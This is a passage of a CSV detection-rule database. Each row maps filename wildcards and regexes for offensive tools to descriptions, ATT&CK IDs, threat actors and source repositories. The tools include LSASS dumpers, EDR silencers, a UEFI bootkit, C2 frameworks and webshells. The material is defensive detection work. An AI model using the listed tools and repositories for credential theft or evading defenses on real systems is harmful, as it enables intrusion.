"*\DumpSvc.exe*",".{0,1000}\\DumpSvc\.exe.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","15124"
"*\DumpThatLSASS.*",".{0,1000}\\DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","15125"
"*\DumpThatLSASS\*",".{0,1000}\\DumpThatLSASS\\.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","15126"
"*\dumpXor.exe*",".{0,1000}\\dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","15127"
"*\dumpXor\x64\*",".{0,1000}\\dumpXor\\x64\\.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","15128"
"*\dumpy.exe*",".{0,1000}\\dumpy\.exe.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","15129"
"*\DynastyPersist\src\*.sh*",".{0,1000}\\DynastyPersist\\src\\.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","15206"
"*\Eagle RAT.exe*",".{0,1000}\\Eagle\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15207"
"*\earthworm.exe*",".{0,1000}\\earthworm\.exe.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","15208"
"*\EASSniper.ps1*",".{0,1000}\\EASSniper\.ps1.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","15209"
"*\EASSniper.ps1*",".{0,1000}\\EASSniper\.ps1.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","15210"
"*\eas-valid-users.txt*",".{0,1000}\\eas\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","15211"
"*\eb.exe*payload_x64.dll*",".{0,1000}\\eb\.exe.{0,1000}payload_x64\.dll.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15212"
"*\eb.exe*payload_x86.dll*",".{0,1000}\\eb\.exe.{0,1000}payload_x86\.dll.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15213"
"*\eb.exe*payload32.exe*",".{0,1000}\\eb\.exe.{0,1000}payload32\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15214"
"*\eb.exe*payload64.exe*",".{0,1000}\\eb\.exe.{0,1000}payload64\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15215"
"*\ebapc_injection.exe*",".{0,1000}\\ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15216"
"*\ebowla.py*",".{0,1000}\\ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","15217"
"*\ecrprivenum.py*",".{0,1000}\\ecrprivenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","15218"
"*\ecrpubenum.py*",".{0,1000}\\ecrpubenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","15219"
"*\EdgeDump.ahk*",".{0,1000}\\EdgeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","15220"
"*\EDR_Detector.rs*",".{0,1000}\\EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","15221"
"*\edraser.py*",".{0,1000}\\edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","15222"
"*\EDRPrison.csproj*",".{0,1000}\\EDRPrison\.csproj.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","15223"
"*\EDRPrison-main*",".{0,1000}\\EDRPrison\-main.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","15224"
"*\EDRSilencer.c*",".{0,1000}\\EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","15225"
"*\EfiDSEFix.cpp*",".{0,1000}\\EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15226"
"*\EfiDSEFix.exe*",".{0,1000}\\EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15227"
"*\EfiGuard.sln*",".{0,1000}\\EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15228"
"*\EfiGuardDxe.c*",".{0,1000}\\EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15229"
"*\EfiGuardDxe.h*",".{0,1000}\\EfiGuardDxe\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15230"
"*\EfiGuardDxe\X64\*",".{0,1000}\\EfiGuardDxe\\X64\\.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15231"
"*\EfsPotato.exe*",".{0,1000}\\EfsPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15232"
"*\Egress-Assess*",".{0,1000}\\Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","15233"
"*\Ekko.exe*",".{0,1000}\\Ekko\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","15247"
"*\elevate_handle_inheritance.py*",".{0,1000}\\elevate_handle_inheritance\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15248"
"*\elevate_mofcomp.py*",".{0,1000}\\elevate_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15249"
"*\elevate_named_pipe_impersonation.py*",".{0,1000}\\elevate_named_pipe_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15250"
"*\elevate_schtasks.py*",".{0,1000}\\elevate_schtasks\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15251"
"*\elevate_token_impersonation.py*",".{0,1000}\\elevate_token_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15252"
"*\elevate_wmic.py*",".{0,1000}\\elevate_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15253"
"*\elevateit.bat*",".{0,1000}\\elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","15254"
"*\elevator.exe -*",".{0,1000}\\elevator\.exe\s\-.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","15255"
"*\Elevator\target\release*",".{0,1000}\\Elevator\\target\\release.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","15256"
"*\ELF\portscan*",".{0,1000}\\ELF\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","15257"
"*\ELF\serverscan*",".{0,1000}\\ELF\\serverscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","15258"
"*\Elite.csproj*",".{0,1000}\\Elite\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","15259"
"*\Elite.sln*",".{0,1000}\\Elite\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","15260"
"*\ELMALISEKER Backd00r.asp*",".{0,1000}\\ELMALISEKER\sBackd00r\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15261"
